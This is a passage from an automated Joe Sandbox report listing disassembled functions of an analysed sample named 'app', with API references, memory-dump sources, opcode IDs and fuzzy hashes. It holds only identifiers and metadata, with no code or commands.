                                                                                                                                              • Instruction Fuzzy Hash: C91251716043029FDB18DF29C4A162EBBE2BFD8358F14892DE48ACB251DB74DC41CB95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00412AC0 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4
                                                                                                                                              • API String ID: 0-4088798008
                                                                                                                                              • Opcode ID: 105ff6f28f0176ece59784b586960affd2c75ef0e9dd6e2caeb7df49e7281d12
                                                                                                                                              • Instruction ID: ce7be91b107c05d89f27200de5f74fd8ff5e1e004aeb1bf758a9aa92edd98eb5
                                                                                                                                              • Opcode Fuzzy Hash: 105ff6f28f0176ece59784b586960affd2c75ef0e9dd6e2caeb7df49e7281d12
                                                                                                                                              • Instruction Fuzzy Hash: EC129D71D00209AFCF15DF94D940AEEBBB1FF48314F24819AE815AB291C7B9DE52CB64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025EE16F Relevance: 1.6, APIs: 1, Instructions: 374memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025EE5EC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: bd6d15d3c112f7aed241c7520e8de3130531d026a2673d0d3d113c8f5bebbe69
                                                                                                                                              • Instruction ID: a80389b80d889ca5dfb4c1ac2ae69397eb25a02411671864979792568ad20868
                                                                                                                                              • Opcode Fuzzy Hash: bd6d15d3c112f7aed241c7520e8de3130531d026a2673d0d3d113c8f5bebbe69
                                                                                                                                              • Instruction Fuzzy Hash: 43D1F571A183568FDB19CF6CC48166EBBE2BFC9310F088A2DE89697351EB30D944CB45
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025EE605 Relevance: 1.6, APIs: 1, Instructions: 371memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025EEA73
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 9b06a60df97658b9719d57fab09231d4995e181083737e023bc2a3f49aa2be01
                                                                                                                                              • Instruction ID: eb6d85d9a8ab4128564e3921bffb47099159b77b7062c43ffde9fa951e8d46dc
                                                                                                                                              • Opcode Fuzzy Hash: 9b06a60df97658b9719d57fab09231d4995e181083737e023bc2a3f49aa2be01
                                                                                                                                              • Instruction Fuzzy Hash: 65E11271A087428FDB19CF2CC48156AFBE2BFC9314F088A6DE89697351EB30D945CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025F13BD Relevance: 1.6, APIs: 1, Instructions: 357memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,02562930), ref: 025F180A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 629fb5bcfe303d8ce8b4ba39cae90bac15bdd8ae97434efe2f10bd83f4bce6ce
                                                                                                                                              • Instruction ID: ea00b9e3491d974b9399796a303d0e9a1edddd3fd02a8aac17712bf6f50b7e9e
                                                                                                                                              • Opcode Fuzzy Hash: 629fb5bcfe303d8ce8b4ba39cae90bac15bdd8ae97434efe2f10bd83f4bce6ce
                                                                                                                                              • Instruction Fuzzy Hash: 6ED1C231A08B428FD725CF2CC49052AFBE1BFC9214F188A6DE9DA97351EB70D844CB46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041E705 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 0041E728
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoLocale
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                              • Opcode ID: aec6594c86302d122d4f71fb4d9b161a13d7bbfc32bbdc78518e23443962e317
                                                                                                                                              • Instruction ID: e85e805a3fba895054420c9dab990c78e1ee1b5e14cd5d478966e3f2ece6382d
                                                                                                                                              • Opcode Fuzzy Hash: aec6594c86302d122d4f71fb4d9b161a13d7bbfc32bbdc78518e23443962e317
                                                                                                                                              • Instruction Fuzzy Hash: 30F03035A04208EBDB00DB71D946BDE77B9AF04318F504176F921DA1D0DB74EA459708
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041B198 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001B152), ref: 0041B19D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              • Opcode ID: 90184e0bf99737bad7b3f49374a4ba74c04221f632f12a436ad7bc65f60bf99e
                                                                                                                                              • Instruction ID: 44c96ef74a1c1fbbfd07129883de79b675f03fbc3a68b556817faf6bab53d9ec
                                                                                                                                              • Opcode Fuzzy Hash: 90184e0bf99737bad7b3f49374a4ba74c04221f632f12a436ad7bc65f60bf99e
                                                                                                                                              • Instruction Fuzzy Hash: 05A012753012008747108F709C091403665E2016453814435A000C1311DB3040145589
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041B1AC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 0041B1B1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              • Opcode ID: abca96f171b0050d79f7799da41200dda6ac2e8c85e9cb135c27efb12445af08
                                                                                                                                              • Instruction ID: 1845281a5277d0a3e631376a96d3cbc5c82ed2965258bf50e72ab3e51ac72b24
                                                                                                                                              • Opcode Fuzzy Hash: abca96f171b0050d79f7799da41200dda6ac2e8c85e9cb135c27efb12445af08
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D3239 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Invalid
                                                                                                                                              • API String ID: 0-874791708
                                                                                                                                              • Opcode ID: b659ca8c6e00dbab7138070e80762619299fd0e6f4ad1f276d95c0bedcc002dc
                                                                                                                                              • Instruction ID: 6e3b98ce8ae4565e51baa48762cae59fc137ac0ca859a760f5028aa8a09b957b
                                                                                                                                              • Opcode Fuzzy Hash: b659ca8c6e00dbab7138070e80762619299fd0e6f4ad1f276d95c0bedcc002dc
                                                                                                                                              • Instruction Fuzzy Hash: 09914F71A043019FD718CF29C49066ABBE6BFC8314F14C6ADE45ADB691DB31E846CF86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00404358 Relevance: .8, Instructions: 806COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 49ea5447d0855135be658535b3d383872752d319a27ff9739b2d70c6a8c7ad55
                                                                                                                                              • Instruction ID: 1f32112f5d1d97fa5f5208333258e9b5d7bed76fe60824153b00f1bbb4c0fe1f
                                                                                                                                              • Opcode Fuzzy Hash: 49ea5447d0855135be658535b3d383872752d319a27ff9739b2d70c6a8c7ad55
                                                                                                                                              • Instruction Fuzzy Hash: B9529F36B4060A9BEB0CCE9ACCD15DCB7A3ABC835471DC23CD915D7745DAB8A907CA90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025E3389 Relevance: .6, Instructions: 637COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b1a7cd4ad4237f66a7f5b479c8a9d6e5fe355ec74f0ac4fcd0080180acf3cb83
                                                                                                                                              • Instruction ID: 48c69dfcf81588823c214f31e196cb8dfc36c04a85493f5a62082bf305e22e04
                                                                                                                                              • Opcode Fuzzy Hash: b1a7cd4ad4237f66a7f5b479c8a9d6e5fe355ec74f0ac4fcd0080180acf3cb83
                                                                                                                                              • Instruction Fuzzy Hash: 66324361D69F011DDB279535D822339A64DBFB33C4F19EB27E81AB2A99EF29D0C34104
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00425B56 Relevance: .4, Instructions: 441COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b497888ff59478dcbc58287f06f310b8c6890e4d9cc07b4980c569479dfc9433
                                                                                                                                              • Instruction ID: 647ce0f78b06017cf660a0f23f26868c8a6fa8cab28443e38f1770b9ff9b5a24
                                                                                                                                              • Opcode Fuzzy Hash: b497888ff59478dcbc58287f06f310b8c6890e4d9cc07b4980c569479dfc9433
                                                                                                                                              • Instruction Fuzzy Hash: CCE1AC70700625EBDB14DF15E880ABE77A9EF48304F91801BF816DB252DB3DDA01EB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040964F Relevance: .4, Instructions: 367COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b172e2b0bcc3e4b70a5f746494a3de25a59c6e33974ff90734639386dca649a6
                                                                                                                                              • Instruction ID: 38452df248bf53abee5655b8306aeabdc0ec6d6b7da8aebdf4c000082fc220b6
                                                                                                                                              • Opcode Fuzzy Hash: b172e2b0bcc3e4b70a5f746494a3de25a59c6e33974ff90734639386dca649a6
                                                                                                                                              • Instruction Fuzzy Hash: 3A916562F443143AF631A9B74D4FF6B6D9CCB86B94F01093EB648BA1C3E4F99D0481A5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025C42F5 Relevance: .4, Instructions: 364COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6059d0d72ec0c334f3be18ddc565dea93af22ea22949ed55b3ca8cd2e70e0d3c
                                                                                                                                              • Instruction ID: c3973503fe050827e959dac97388729fb7cbdc1d4b26a23f9ad82fba61604538
                                                                                                                                              • Opcode Fuzzy Hash: 6059d0d72ec0c334f3be18ddc565dea93af22ea22949ed55b3ca8cd2e70e0d3c
                                                                                                                                              • Instruction Fuzzy Hash: ECD1E47160C3818FD7258FA4D0B4B7ABFE2BFD6204F69485EE4C547242E775888ACB06
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00418E0E Relevance: .3, Instructions: 255COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 928e56e57a48a481a7910e8e9d35efa608cd7d846a12f7b1813392c24604a220
                                                                                                                                              • Instruction ID: 8c976a428b59b3ae0ebb38614f34ffe00415377cb4a8672460f2c7db1d41e954
                                                                                                                                              • Opcode Fuzzy Hash: 928e56e57a48a481a7910e8e9d35efa608cd7d846a12f7b1813392c24604a220
                                                                                                                                              • Instruction Fuzzy Hash: AAB16B3590020ADFDB15CF04C5D0AE9BBA1BF58318F14C1AED81A5B342DB35EE86CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025BE030 Relevance: .2, Instructions: 235COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b11c29d731a3fe359ff3c8960c25e70cf1d6ef21bad3e438abc49f0186303c47
                                                                                                                                              • Instruction ID: c65f4db1ee1ab5aea9874099a5b32825c7925b74f3c3ddba256538461b66e313
                                                                                                                                              • Opcode Fuzzy Hash: b11c29d731a3fe359ff3c8960c25e70cf1d6ef21bad3e438abc49f0186303c47
                                                                                                                                              • Instruction Fuzzy Hash: 8B719F32F287414BD71A4A3D98122F6BA96AFD6185F59D73BF849F77C1FB3488024248
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0256B1F0 Relevance: .2, Instructions: 230COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b99048aadc9108a7a47e8d757a13be714c2c91adfe30a4968028326f1f6aabb
                                                                                                                                              • Instruction ID: d94da61a4d33c70127931096d79afcb62bb82fddacdbbb9f7af1e86fbf498934
                                                                                                                                              • Opcode Fuzzy Hash: 5b99048aadc9108a7a47e8d757a13be714c2c91adfe30a4968028326f1f6aabb
                                                                                                                                              • Instruction Fuzzy Hash: F571E4727183154BD7088E2DCC9032EB7D6ABC8764F1A8A3DE8A9D73D1E674CC058B85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02563130 Relevance: .2, Instructions: 229COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b4242db804f160874d45c6eac3e819e203fa8982cc2c38a369c0292fe220eb0
                                                                                                                                              • Instruction ID: b0cb0d300f20ddebd6507bc7e18408973e55d3e3f069e74c3814ee5996f79b5a
                                                                                                                                              • Opcode Fuzzy Hash: 5b4242db804f160874d45c6eac3e819e203fa8982cc2c38a369c0292fe220eb0
                                                                                                                                              • Instruction Fuzzy Hash: 2A810231B14346AFD718CE58C4A433ABBD2BBC5B14F0986ADD99A5B385DF309C09CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D20E3 Relevance: .2, Instructions: 216COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 998677bf26be223f5bce6a2b86f89a1f9df7ccf45b26c7b66d4fc4a99f3cffc7
